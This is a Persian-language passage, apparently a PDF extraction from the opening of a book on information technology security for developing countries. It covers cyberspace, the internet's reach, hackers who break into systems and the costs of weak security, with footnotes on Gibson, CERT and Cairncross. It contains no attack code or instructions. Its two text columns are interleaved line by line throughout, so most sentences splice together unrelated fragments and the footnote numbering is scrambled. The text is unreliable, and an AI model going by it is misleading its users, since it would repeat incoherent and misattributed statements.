ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ ﻣـﻲ ﺷـﻮﻧﺪ ﻭ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻮﺍﺻﻞ ﺭﺍ ﺍﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ١٦.ﺩﺭ
ﻣﻴﺎﻥ ﺑﺮﺩﺍﺭﺩ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﺑﻲﺷﻤﺎﺭﻱ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻛﻨـﺪ. ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻢ ﻣﺜﻞ ﻓﻀﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻼﻗﺎﺗﻬﺎ
ﺑــﺎ ﻭﺟــﻮﺩ ﺷــﺒﻜﺔ ﺟﻬــﺎﻧﻲ ﻭﺏ ،ﺍﻳﻨﺘﺮﻧــﺖ ﻗــﺎﺩﺭ ﺧﻮﺍﻫــﺪ ﺑــﻮﺩ ﺍﺯ ﻭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺻﺤﺒﺖ ﻛﺮﺩ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺭﻓﺘـﺎﺭ ﺩﺭ ﻓـﻀﺎﻱ
ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺩﺭﺑــﺎﺭﺓ ﺷــﺮﻛﺘﻬﺎ ،ﺍﻣﻜﺎﻧــﺎﺕ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺳﺎﻳﺒﺮ ﻭ ﺩﻧﻴﺎﻱ ﺣﻘﻴﻘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺯﻧﺪﮔﻲ ،ﻛﺎﺭ ﻭ ﺑﺎﺯﻱ ﻣﻲﻛﻨـﻴﻢ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺗﺠـﺎﺭﺕ ﺭﺍ ﺩﺭ ﺁﻧﻬـﺎ ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﺷﺪ.
ﺗﻮﺳــﻌﻪ ﺩﻫــﺪ .ﻋــﻼﻭﻩ ﺑــﺮ ﺍﻳــﻦ ،ﻣﻮﺗﻮﺭﻫــﺎﻱ ﺟــﺴﺘﺠﻮ ﺍﺯ ﻧﻈــﺮ
ﮔــﺴﺘﺮﺵ ﻭ ﺭﻭﺍﺝ ﺳــﺮﻳﻊ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﺷﺨــﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ
ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﺗﻤﺎﻳﺰﻱ ﻣﻴﺎﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻗﺎﺋـﻞ ﻧﻤـﻲ ﺷـﻮﻧﺪ؛ ﻭ
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺗﺄﻣﻴﻦ ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻭ ﻛﺎﻻﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﻣﻮﺍﺩ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻨـﺎﻓﻊ ﺑـﺴﻴﺎﺭﻱ
ﺍﻭﻟﻴـــﺔ ﻛـــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـــﺎﻝ ﺗﻮﺳـــﻌﻪ ﺭﻭﻱ ﻭﺏ ﺩﺭ ﻛﻨـــﺎﺭ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺨﻮﺩﻱ ﺧﻮﺩ ﺭﺳـﺎﻧﻪﺍﻱ ﻧﻴـﺴﺖ
ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﻛﺎﻻﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻗـﺮﺍﺭ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺭﻓﺘﺎﺭ ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﺍﻳﻤﻨﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ .ﻫﺰﻳﻨـﺔ ﻋـﺪﻡ
٢١ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﻮﺭﺩ
ﻣﻲﮔﻴﺮﻧﺪ ٢٠.ﺍﻳﻦ ﺍﻣﺮ ﺭﺍ ﮔﺎﻫﻲ "ﻣـﺮﮒ ﻓﺎﺻـﻠﻪﻫـﺎ" ﻣـﻲﻧﺎﻣﻨـﺪ؛
ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﺑـﺰﺭﮒ ﻳـﺎ ﻣﺆﺳـﺴﺔ ﺩﻭﻟﺘـﻲ
ﻭﺍﮊﻩﺍﻱ ﻛﻪ ﺭﻭﻧﺪ ﺟﺮﻳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ.
ﺑﺎﺷﺪ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻫﻴﺘﹰﺎ ﺍﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﺍﻣﺎ ﻫﺰﻳﻨـﺔ
ﺍﻣﻦ ﻛﺮﺩﻥ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ
17 Cyber Attacks
18 Computer Emergency Response Team
19 Reuters/USA Today, April 16, 2003 15 Cyberspace
ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﺑـﺎﻥ ﻣﻴـﺎﻥ ﭘﺎﺳـﺨﻬﺎﻱ ۲۰ "ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ" ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺗﻮﺳـﻂ ﻳـﻚ ﻧﻮﻳـﺴﻨﺪﻩ ﺑـﻪ ﻧـﺎﻡ William ۱۶
ﻳﺎﻓﺘﻪﺷﺪﻩ ﺗﻔﺎﻭﺕ ﻣﻲﮔﺬﺍﺭﻧﺪ ،ﻭ ﻟﺬﺍ ﺩﺭ ﺑﺎﺯﺍﺭ ﺟﻬﺎﻧﻲ ﻫﺮ ﻛـﺲ ﺑﺎﻳـﺪ ﺑـﻪ Gibsonﺑﺮﺍﻱ ﻳﻚ ﺩﻧﻴﺎﻱ ﻣﻮﺍﺯﻱ ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺮﺍﺳﺮ ﺩﻧﻴـﺎ
ﺯﺑﺎﻥ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﺧﻮﺩ ﺻـﺤﺒﺖ ﻛﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺳـــﺎﺧﺘﻪ ﺷـــﺪﻩ ﺑـــﻮﺩ ﺩﺭ ﺳـــﺎﻝ ۱۹۸۴ﻭ ﺩﺭ ﺭﻣـــﺎﻥ ﺍﻭ ﺑـــﺎ ﻋﻨـــﻮﺍﻥ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﺗﺤﻤﻞ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻨﺘﻈـﺮ ﺩﺭﻳﺎﻓـﺖ " "Neuromancerﺑﻜﺎﺭ ﺭﻓﺖ .ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺩﺑﻴﺎﺕ ﻣﻔﻴﺪ
ﭘﺎﺳﺦ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﺭﺗﺒﺎﻃـﺸﺎﻥ ﻛﻨـﺪ ﺍﺳـﺖ .ﺩﺭ ﻫﺮﺣـﺎﻝ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻌﻨﻲ ﺁﻥ ﺑﺘﺪﺭﻳﺞ ﺍﺯ ﺁﻧﭽﻪ Gibsonﻣﺪ ﻧﻈﺮ ﺩﺍﺷـﺖ ﺗﻐﻴﻴـﺮ
ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻣﻴﺰﺑﺎﻧﻲ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻫﻤﻴﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﻭ
ﻛﻨﻨﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﻞ ﻣﻴﺰﺑﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺑﺮﮔﺰﻳﻨﻨـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﻪ ﻳﺎ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
ﺑﺎﺯﺍﺭﻫــﺎﻱ ﻫــﺪﻑ ﻧﺰﺩﻳــﻚ ﺑﺎﺷــﺪ .ﺑﻌــﻀﻲ ﺍﺯ ﺷــﺮﻛﺘﻬﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ Intven, et al., Legal and Regulatory Aspects of
e-Commerce and the Internet, World Bank
ﺍﻧﻌﻜﺎﺳﻲ ) (mirror sitesﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻳـﻚ )Legal Review, vol. 1 2003, at fn 17. (Kluwer
٣١ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺳﻴــﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﺷــﻮﻧﺪ ﻭ ﻣــﺸﻜﻼﺗﻲ ﺑﻮﺟــﻮﺩ ﺑﻴﺎﻭﺭﻧــﺪ .ﺑﻴــﺸﺘﺮ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻫﻤﻮﺍﺭﻩ ﻣﺨﺎﻃﺮﺍﺗﻲ ﺟﺪﻱ ﻣﺎﻧﻨـﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ
ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺯ ﺟﺎﻧﺐ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ٢٤ﻧﺎﺷـﻲ ﺳﻮﺍﺑﻖ ،ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ،ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺑﺨﺶ ﺍﻭﻝ
ﻣﻲﺷﻮﺩ .ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺛﺎﺑـﺖ ﻛﻨﻨـﺪ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺧﺼﻤﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺗﻤﺎﻡ ﻳـﺎ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﺮ ﺳﺪ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺳﺮ ﺭﺍﻫﺸﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﺨﺸﻲ ﺍﺯ ﺳﻮﺍﺑﻖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺯﻣﻴﻨﮕﻴـﺮ
ﻋﺒﻮﺭ ﻛﻨﻨﺪ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺭﺍ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻛﻨﺪ .ﺑﺮﺍﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺿـﻌﻴﻒ
ﻣﺪﻝ ﻛﻨﻴﻢ ﺑﺎﻳﺪ ﻓﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﻫـﻴﻢ ﻛـﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺍﺳﺖ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺁﻥ ﺩﺭ ﻣﻌـﺮﺽ
ﺛﺎﺑﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﺎﻧﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺪﻭﻥ ﺩﺳﺖ ﺧﻄﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﺻﺪﻣﺎﺕ ﺟﺒﺮﺍﻥ ﻧﺎﭘـﺬﻳﺮﻱ ﻭﺍﺭﺩ ﺷـﻮﺩ.
ﺯﺩﻥ ﺑﻪ ﭼﻴﺰﻱ ﺧﺎﺭﺝ ﺷﻮﺩ! ﭼﻨﻴﻦ ﭘﺪﻳﺪﻩﺍﻱ ﻧﻪﺗﻨﻬﺎ ﻣﻮﺟﺐ ﺑـﺮﻭﺯ ﻋﺪﻡ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺍﺑـﻂ
ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﻋﺪﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﺭﺍ ﻧﻴـﺰ ﺧﺎﺭﺟﻲ ﺩﺭ ﺻﻨﺎﻳﻊ ﺧﻮﺩ ﺍﻫﻤﻴـﺖ ﻣـﻲﺩﻫﻨـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ
ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻦ ﻳـﺎ ﻛـﻢ ﺷـﺪﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﻭ ﭘﻴﺶ ﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺍﻱ ﮔﺮﺩﺩ .ﻧﻴﻞ ﺑـﻪ ﺍﻫـﺪﺍﻑ
ﺍﺳﺖ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻮﺳﻌﺔ ﻫﺰﺍﺭﻩ ) ٢٢(MDGﺑﻪ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ
ﻧﻔﻮﺫﻫﺎﻱ ﺑﻌﺪﻱ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺑﻮﺩﺟـﺔ ﺁﻧﻬـﺎ ﺑـﺎ
٢٣
ﺩﻧﻴــﺎﻱ ﻭﺍﻗﻌــﻲ ﻗﺎﺑــﻞ ﺗﺤﻤــﻞ ﻧﻴــﺴﺖ ،ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﻋﻀﻮﻳﺖ ﺩﺍﺋﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ.
ﻧﻤﻲﺗﻮﺍﻥ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺭﺍ ﺗﺤﻤﻞ ﻛﺮﺩ .ﻓﻨﻮﻥ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺴﺐ ﻭ ﺗﺄﻣﻴﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺐ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺗﻤـﺎﻣﻲ
ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧﻮﺩﺗـﺎﻥ ﺩﺭ ﻣﻘﺎﺑـﻞ ﭼﻨـﻴﻦ ﺭﻓﺘﺎﺭﻫـﺎﻳﻲ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻛﻤﻚ ﻛﻨﺪ.
ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﻇﻮﺍﻫﺮ ﺧﻮﺏ ﻭ ﺑﺪ ﺍﻧﺴﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓـﻀﺎﻱ
ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﻫﺮ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻣـﻀﺎﻣﻴﻦ
ﻛﺴﺐ ﺩﺍﻧﺴﺘﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﻭﻳــﺮﺍﻳﺶ ﺁﻧﻬــﺎ ﺁﺳــﺎﻥ ﺍﺳــﺖ ،ﻣﻐﺎﻟﻄــﻪ ﻭ ﺗﺤﺮﻳــﻒ
ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﻣﻬﺎﺭﺗﻬﺎﻳﺘﺎﻥ ﺑﻲ ﻧﻴﺎﺯ ﻧﻤﻲ ﻛﻨﺪ .ﺍﻣـﺮﻭﺯﻩ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺜﻞ ﺟﻌﻞ ﻣﺴﺘﻨﺪﺍﺕ ﺍﺩﺍﺭﻱ ﻭ ﺭﺳﻤﻲ ﺁﺳﺎﻥ ﻣﻲﺷـﻮﺩ.
ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺩﻧﻴﺎﻱ ﺷﮕﻔﺖ ﺍﻧﮕﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﻧﺴﺘﻪﻫﺎ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﺁﻧﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻳﻚ ﻣﺤﻴﻂ ﭘﮋﻭﻫﺸﻲ ﻭ ﺗﻌﺎﻭﻧﻲ ﺷـﺮﻭﻉ
ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑـﺎ ﻗﻴﻤـﺖ ﺑـﺴﻴﺎﺭ ﻧـﺎﺯﻝ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻫﺪﻑ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺁﺳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺑـﻮﺩ ،ﺳـﺎﺧﺘﺎﺭ
ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲ ﺗـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺁﻥ ﺑﺎﻋــﺚ ﺗــﺴﻬﻴﻞ ﺣﻤﻠــﻪ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺳــﺮﻗﺖ ﺍﻃﻼﻋــﺎﺕ
ﻛﺎﺭﺁﻣﺪ ﻭ ﻣﺆﺛﺮﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺭﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻲﮔﺮﺩﺩ.
ﺍﻳﻦ ﻫﺪﻑ ﻻﺯﻡ ﺍﺳﺖ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻧﮕﻴﺰﺓ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﭼﻨﻴﻦ ﺭﻓﺘﺎﺭﻱ ﺍﺯ ﺧﻮﺩ ﺑـﺮﻭﺯ
ﻣﻘﺎﺑﻞ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ .ﺑﺎ ﻣﻔﻬﻮﻡ ﻫﻮﺷﻴﺎﺭﻱ ﺩﺭ
ﻣﻲﺩﻫﻨﺪ ﺷﺒﻴﻪ ﺍﻧﮕﻴﺰﻩﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ .ﺍﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺑﻴـﺎﻣﻮﺯﻳﻢ ﻛـﻪ ﭼﮕﻮﻧـﻪ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ :ﻣﺤﻴﻄﻲ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻮﺷﻴﺎﺭﻱ )ﻫﻮﺷﻴﺎﺭﻱ ﺳـﺎﻳﺒﺮ( ﺭﺳـﻴﺪ. ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺷـﺪﻩ ﺩﺭ ﺍﻓـﺮﺍﺩ
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷـﻤﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻣﻬـﻢ ﺗﻬﻴـﻪ ﻭ ﺍﻳﻦ ﺗﻤﺎﻳﻞ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﺛﺎﺑﺖ ﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ
ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺍﺳﺖ.
ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻣﺘﻔﺎﻭﺕ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﻨﻨـﺪ
ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺗﺎ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ،ﺣﺪﺍﻗﻞ ﺷﻮﺩ.
21 Cairncross, F., The Death of Distance: How
